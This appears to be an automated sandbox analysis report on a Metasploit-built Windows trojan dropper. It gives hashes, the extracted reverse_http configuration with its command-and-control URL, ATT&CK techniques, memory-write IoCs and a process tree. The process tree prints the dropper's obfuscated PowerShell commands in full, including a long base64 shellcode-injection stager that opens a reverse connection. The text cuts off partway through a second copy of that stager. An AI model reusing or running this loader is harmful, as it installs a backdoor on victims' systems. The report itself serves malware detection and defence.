metasploit | 31e1703f07bd76589a558b15c260de6589615ad0bddd77c4e7efe9575da80af4

General

Target

TrojanDropper.Win32.Boxter.PAA.exe
Size

97KB
MD5

df19aad3e807c22af6adfec6ea8ecdc0
SHA1

8624f7f4c130f23bd740d4028aa3e788f5dcc363
SHA256

31e1703f07bd76589a558b15c260de6589615ad0bddd77c4e7efe9575da80af4
SHA512

4f052f678669ea228f782cb7fa20f79e222bda1b9382c7864ef55c7c9d2c20af8fa9ff7681ae1d5523c345373209c754bb34388b856cb6b51dcd981119b9be1d
SSDEEP

1536:k67ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIf8wbYwDUV/2O0:k4FfHgTWmCRkGbKGLeNTBf8OYoEq

Score

10^/10

metasploit backdoor discovery trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.88.128:8080/niYqSBiVlxtyenN7FKXiWQAJ8zoCU

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanDropper.Win32.Boxter.PAA.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
544	powershell.exe
544	powershell.exe
3660	powershell.exe
3660	powershell.exe
3736	powershell.exe
3736	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 1968	1116	TrojanDropper.Win32.Boxter.PAA.exe	83
PID 1116 wrote to memory of 1968	1116	TrojanDropper.Win32.Boxter.PAA.exe	83
PID 1968 wrote to memory of 544	1968	cmd.exe	84
PID 1968 wrote to memory of 544	1968	cmd.exe	84
PID 544 wrote to memory of 3660	544	powershell.exe	85
PID 544 wrote to memory of 3660	544	powershell.exe	85
PID 3660 wrote to memory of 3736	3660	powershell.exe	86
PID 3660 wrote to memory of 3736	3660	powershell.exe	86
PID 3660 wrote to memory of 3736	3660	powershell.exe	86
PID 3736 wrote to memory of 2244	3736	powershell.exe	89
PID 3736 wrote to memory of 2244	3736	powershell.exe	89
PID 3736 wrote to memory of 2244	3736	powershell.exe	89
PID 2244 wrote to memory of 3936	2244	csc.exe	90
PID 2244 wrote to memory of 3936	2244	csc.exe	90
PID 2244 wrote to memory of 3936	2244	csc.exe	90

C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe
"C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CCB6.tmp\CCB7.tmp\CCB8.bat C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 -C "sv Qpm -;sv mo ec;sv B ((gv Qpm).value.toString()+(gv mo).value.toString());powershell (gv B).value.toString() 'JABBAEUATwAgAD0AIAAnACQAcgBZAHUAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcgBZAHUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA3ADQALAAwAHgANgA2ACwAMAB4ADMAMQAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4AGUAMgAsADAAeABhAGMALAAwAHgAOAA4ACwAMAB4ADgAZQAsADAAeABiAGUALAAwAHgANABlACwAMAB4ADcAMQAsADAAeAA0AGYALAAwAHgAYQAxACwAMAB4AGMANwAsADAAeAA5ADQALAAwAHgANwBlACwAMAB4AGYAMwAsADAAeABiADMALAAwAHgAZABkACwAMAB4AGQAMwAsADAAeABjADMALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeABkAGYALAAwAHgAYQA4ACwAMAB4ADkANAAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADEAOQAsADAAeAA1ADIALAAwAHgANgBmACwAMAB4ADYANAAsADAAeAAxADcALAAwAHgANABhACwAMAB4ADUAZQAsADAAeAA4ADUALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeAAwAGMALAAwAHgANAA1ACwAMAB4ADYAYgAsADAAeAAzADYALAAwAHgANABmACwAMAB4ADkAYQAsADAAeAA0AGIALAAwAHgAMAA3ACwAMAB4ADgAMAAsADAAeABlAGYALAAwAHgAOABhACwAMAB4ADQAMAAsADAAeAA1ADYALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeAAxAGMALAAwAHgAMwBlACwAMAB4AGUAZQAsADAAeAAyAGUALAAwAHgAYgAwACwAMAB4ADQAYgAsADAAeABiADIALAAwAHgAZgAyACwAMAB4AGIAMQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjADkALAAwAHgAOQBlACwAMAB4ADcAZgAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4AGEAMAAsADAAeABhAGYALAAwAHgAOQAwACwAMAB4AGYAZQAsADAAeABlAGEALAAwAHgANQA3ACwAMAB4ADkAYQAsADAAeAA1ADgALAAwAHgAYwBiACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANQAzACwAMAB4AGUAYwAsADAAeAAyAGIALAAwAHgAOQA0ACwAMAB4ADIAMAAsADAAeAAzAGEALAAwAHgANQBmACwAMAB4ADIANgAsADAAeABlADEALAAwAHgANwAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAYwBjACwAMAB4AGIAYwAsADAAeAAxADIALAAwAHgAZAA3ACwAMAB4ADAAOQAsADAAeAA3AGEALAAwAHgAYwBkACwAMAB4AGEAMgAsADAAeAA2ADEALAAwAHgANwA5ACwAMAB4ADcAMAAsADAAeABiADUALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeABhAGUALAAwAHgAMwAwACwAMAB4ADIANgAsADAAeABhADIALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAA4ADIALAAwAHgANQAzACwAMAB4AGUAOQAsADAAeAA3ADUALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADYALAAwAHgAZgAxACwAMAB4ADAAZQAsADAAeAA0ADMALAAwAHgANQA5ACwAMAB4AGQANgAsADAAeAAyADQALAAwAHgANwBmACwAMAB4AGQAMgAsADAAeABkADkALAAwAHgAZQBhACwAMAB4AGYANgAsADAAeABhADAALAAwAHgAZgBkACwAMAB4ADIAZQAsADAAeAA1ADMALAAwAHgANwAyACwAMAB4ADkAZgAsADAAeAA3ADcALAAwAHgAMwA5ACwAMAB4AGQANQAsADAAeABhADAALAAwAHgANgA4ACwAMAB4AGUANQAsADAAeAA4AGEALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeAAwADcALAAwAHgAZABjACwAMAB4ADMAOQAsADAAeAAwAGIALAAwAHgAZAA4ACwAMAB4AGUAMQAsADAAeAA2ADcALAAwAHgAOQBjACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADUAYwAsADAAeABmAGMALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeAAzADMALAAwAHgAOQA1ACwAMAB4AGEAZQAsADAAeAAxAGQALAAwAHgAOAA3ACwAMAB4ADEAMgAsADAAeAA2ADkALAAwAHgAZAA5ACwAMAB4AGUAOAAsADAAeAAwADkALAAwAHgANAA0ACwAMAB4ADMAZQAsADAAeAA0ADUALAAwAHgAZQAyACwAMAB4AGYANAAsADAAeAA5ADMALAAwAHgAMwA5ACwAMAB4ADYAYwAsADAAeABjADEALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4AGIAZgAsADAAeAA2ADQALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADMALAAwAHgAZAA4ACwAMAB4ADMANQAsADAAeABmADcALAAwAHgAZAAzACwAMAB4AGMAMQAsADAAeABiADkALAAwAHgAMAA3ACwAMAB4ADMAYwAsADAAeAA0AGQALAAwAHgAYgA5ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAOAAxACwAMAB4AGQANwAsADAAeAA2AGUALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeAA3ADQALAAwAHgAMwAzACwAMAB4ADcAYwAsADAAeAAxADkALAAwAHgAMQA2ACwAMAB4AGMAYgAsADAAeAAwAGEALAAwAHgAZABjACwAMAB4ADgAMwAsADAAeAA0ADUALAAwAHgAYgBkACwAMAB4ADIAOQAsADAAeAAwAGQALAAwAHgAZAAxACwAMAB4ADEAOQAsADAAeAAzAGYALAAwAHgAYwA2ACwAMAB4AGIANAAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGQAMAAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADQAYQAsADAAeAA3ADUALAAwAHgAYgAxACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgAMgAyACwAMAB4ADMAOAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADMAMwAsADAAeABlAGYALAAwAHgAYgAzACwAMAB4AGIAYQAsADAAeAA5ADgALAAwAHgANwA4ACwAMAB4AGMANAAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4AGYAZAAsADAAeAA5ADcALAAwAHgAMgA3ACwAMAB4ADUANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4ADkAZQAsADAAeAAzADEALAAwAHgAYgBlACwAMAB4ADMAZQAsADAAeAAzADAALAAwAHgAZgBhACwAMAB4AGIAZgAsADAAeAAxADQALAAwAHgAZABhACwAMAB4ADkANgAsADAAeAAzADUALAAwAHgAYwA4ACwAMAB4ADgAYgAsADAAeABlADYALAAwAHgANwA5ACwAMAB4AGYANgAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADkAZAAsADAAeAA5AGMALAAwAHgANABmACwAMAB4ADMAZgAsADAAeAAzADQALAAwAHgANwBlACwAMAB4ADAANgAsADAAeABkADcALAAwAHgAYgBkACwAMAB4AGMANgAsADAAeAAzADgALAAwAHgAYQAxACwAMAB4AGMAMQAsADAAeAAxADIALAAwAHgAMQA3ACwAMAB4AGYAZQAsADAAeAA2AGUALAAwAHgAYwBlACwAMAB4AGMAZQAsADAAeAA2ADgALAAwAHgAYgBjACwAMAB4AGYANgAsADAAeABmADYALAAwAHgAMQAzACwAMAB4ADQAMQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4ADIAMwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAMgAwACwAMAB4AGUAMwAsADAAeABmADQALAAwAHgANAAzACwAMAB4ADAAMwAsADAAeAAxADMALAAwAHgAYwAxACwAMAB4ADcAMwAsADAAeAA3ADQALAAwAHgAMAA2ACwAMAB4ADYANQAsADAAeAAwADYALAAwAHgANAA2ACwAMAB4AGMAMQAsADAAeAA4AGEALAAwAHgANQBkACwAMAB4AGYAYQAsADAAeAA0ADQALAAwAHgAOQA0ACwAMAB4ADQAOAAsADAAeAA5ADEALAAwAHgAMgA4ACwAMAB4ADAAMgAsADAAeAA3ADIALAAwAHgANwA2ACwAMAB4AGEAOQAsADAAeABkADIALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABhADkALAAwAHgAOQAyACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgAYwAxACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOQBhACwAMAB4AGYANAAsADAAeAA5ADQALAAwAHgAYQBiACwAMAB4ADgAZQAsADAAeABhADQALAAwAHgAMwA5ACwAMAB4AGQAYQAsADAAeAA1ADYALAAwAHgAMQBkACwAMAB4AGQANgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4AGEAMgAsADAAeAAyADYALAAwAHgAOABmACwAMAB4AGUAZQAsADAAeABjAGEALAAwAHgAMwA0ACwAMAB4AGIAOQAsADAAeAA4ADYALAAwAHgAZQA5ACwAMAB4AGMANgAsADAAeAAxADAALAAwAHgAMQBkACwAMAB4ADIAZAAsADAAeAA0AGMALAAwAHgANQA3ACwAMAB4ADkANQAsADAAeABhADkALAAwAHgAYQBjACwAMAB4AGEANAAsADAAeAAyAGYALAAwAHgANwA1ACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgANgA4ACwAMAB4AGIANQAsADAAeAA3AGIALAAwAHgAZQA3ACwAMAB4AGUAMAAsADAAeABjADYALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABjADMALAAwAHgAMAAxACwAMAB4AGIANgAsADAAeABkADgALAAwAHgAMQA1ACwAMAB4ADQANAAsADAAeAA4AGUALAAwAHgAMABhACwAMAB4ADYAZQAsADAAeAA5ADAALAAwAHgAYwAwACwAMAB4ADYAMwAsADAAeABiAGMALAAwAHgAZAA4ACwAMAB4ADEAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQBpAHAAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFEAaQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABRAGkAcAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEARQBPACkAKQA7ACQAZgBkAEkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBpAHcAdAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABlAGkAdwB0ACAAJABmAGQASQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABmAGQASQAgACQAZQAiADsAfQA='"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABBAEUATwAgAD0AIAAnACQAcgBZAHUAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcgBZAHUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA3ADQALAAwAHgANgA2ACwAMAB4ADMAMQAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4AGUAMgAsADAAeABhAGMALAAwAHgAOAA4ACwAMAB4ADgAZQAsADAAeABiAGUALAAwAHgANABlACwAMAB4ADcAMQAsADAAeAA0AGYALAAwAHgAYQAxACwAMAB4AGMANwAsADAAeAA5ADQALAAwAHgANwBlACwAMAB4AGYAMwAsADAAeABiADMALAAwAHgAZABkACwAMAB4AGQAMwAsADAAeABjADMALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeABkAGYALAAwAHgAYQA4ACwAMAB4ADkANAAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADEAOQAsADAAeAA1ADIALAAwAHgANgBmACwAMAB4ADYANAAsADAAeAAxADcALAAwAHgANABhACwAMAB4ADUAZQAsADAAeAA4ADUALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeAAwAGMALAAwAHgANAA1ACwAMAB4ADYAYgAsADAAeAAzADYALAAwAHgANABmACwAMAB4ADkAYQAsADAAeAA0AGIALAAwAHgAMAA3ACwAMAB4ADgAMAAsADAAeABlAGYALAAwAHgAOABhACwAMAB4ADQAMAAsADAAeAA1ADYALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeAAxAGMALAAwAHgAMwBlACwAMAB4AGUAZQAsADAAeAAyAGUALAAwAHgAYgAwACwAMAB4ADQAYgAsADAAeABiADIALAAwAHgAZgAyACwAMAB4AGIAMQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjADkALAAwAHgAOQBlACwAMAB4ADcAZgAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4AGEAMAAsADAAeABhAGYALAAwAHgAOQAwACwAMAB4AGYAZQAsADAAeABlAGEALAAwAHgANQA3ACwAMAB4ADkAYQAsADAAeAA1ADgALAAwAHgAYwBiACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANQAzACwAMAB4AGUAYwAsADAAeAAyAGIALAAwAHgAOQA0ACwAMAB4ADIAMAAsADAAeAAzAGEALAAwAHgANQBmACwAMAB4ADIANgAsADAAeABlADEALAAwAHgANwAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAYwBjACwAMAB4AGIAYwAsADAAeAAxADIALAAwAHgAZAA3ACwAMAB4ADAAOQAsADAAeAA3AGEALAAwAHgAYwBkACwAMAB4AGEAMgAsADAAeAA2ADEALAAwAHgANwA5ACwAMAB4ADcAMAAsADAAeABiADUALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeABhAGUALAAwAHgAMwAwACwAMAB4ADIANgAsADAAeABhADIALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAA4ADIALAAwAHgANQAzACwAMAB4AGUAOQAsADAAeAA3ADUALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADYALAAwAHgAZgAxACwAMAB4ADAAZQAsADAAeAA0ADMALAAwAHgANQA5ACwAMAB4AGQANgAsADAAeAAyADQALAAwAHgANwBmACwAMAB4AGQAMgAsADAAeABkADkALAAwAHgAZQBhACwAMAB4AGYANgAsADAAeABhADAALAAwAHgAZgBkACwAMAB4ADIAZQAsADAAeAA1ADMALAAwAHgANwAyACwAMAB4ADkAZgAsADAAeAA3ADcALAAwAHgAMwA5ACwAMAB4AGQANQAsADAAeABhADAALAAwAHgANgA4ACwAMAB4AGUANQAsADAAeAA4AGEALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeAAwADcALAAwAHgAZABjACwAMAB4ADMAOQAsADAAeAAwAGIALAAwAHgAZAA4ACwAMAB4AGUAMQAsADAAeAA2ADcALAAwAHgAOQBjACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADUAYwAsADAAeABmAGMALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeAAzADMALAAwAHgAOQA1ACwAMAB4AGEAZQAsADAAeAAxAGQALAAwAHgAOAA3ACwAMAB4ADEAMgAsADAAeAA2ADkALAAwAHgAZAA5ACwAMAB4AGUAOAAsADAAeAAwADkALAAwAHgANAA0ACwAMAB4ADMAZQAsADAAeAA0ADUALAAwAHgAZQAyACwAMAB4AGYANAAsADAAeAA5ADMALAAwAHgAMwA5ACwAMAB4ADYAYwAsADAAeABjADEALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4AGIAZgAsADAAeAA2ADQALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADMALAAwAHgAZAA4ACwAMAB4ADMANQAsADAAeABmADcALAAwAHgAZAAzACwAMAB4AGMAMQAsADAAeABiADkALAAwAHgAMAA3ACwAMAB4ADMAYwAsADAAeAA0AGQALAAwAHgAYgA5ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAOAAxACwAMAB4AGQANwAsADAAeAA2AGUALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeAA3ADQALAAwAHgAMwAzACwAMAB4ADcAYwAsADAAeAAxADkALAAwAHgAMQA2ACwAMAB4AGMAYgAsADAAeAAwAGEALAAwAHgAZABjACwAMAB4ADgAMwAsADAAeAA0ADUALAAwAHgAYgBkACwAMAB4ADIAOQAsADAAeAAwAGQALAAwAHgAZAAxACwAMAB4ADEAOQAsADAAeAAzAGYALAAwAHgAYwA2ACwAMAB4AGIANAAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGQAMAAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADQAYQAsADAAeAA3ADUALAAwAHgAYgAxACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgAMgAyACwAMAB4ADMAOAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADMAMwAsADAAeABlAGYALAAwAHgAYgAzACwAMAB4AGIAYQAsADAAeAA5ADgALAAwAHgANwA4ACwAMAB4AGMANAAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4AGYAZAAsADAAeAA5ADcALAAwAHgAMgA3ACwAMAB4ADUANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4ADkAZQAsADAAeAAzADEALAAwAHgAYgBlACwAMAB4ADMAZQAsADAAeAAzADAALAAwAHgAZgBhACwAMAB4AGIAZgAsADAAeAAxADQALAAwAHgAZABhACwAMAB4ADkANgAsADAAeAAzADUALAAwAHgAYwA4ACwAMAB4ADgAYgAsADAAeABlADYALAAwAHgANwA5ACwAMAB4AGYANgAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADkAZAAsADAAeAA5AGMALAAwAHgANABmACwAMAB4ADMAZgAsADAAeAAzADQALAAwAHgANwBlACwAMAB4ADAANgAsADAAeABkADcALAAwAHgAYgBkACwAMAB4AGMANgAsADAAeAAzADgALAAwAHgAYQAxACwAMAB4AGMAMQAsADAAeAAxADIALAAwAHgAMQA3ACwAMAB4AGYAZQAsADAAeAA2AGUALAAwAHgAYwBlACwAMAB4AGMAZQAsADAA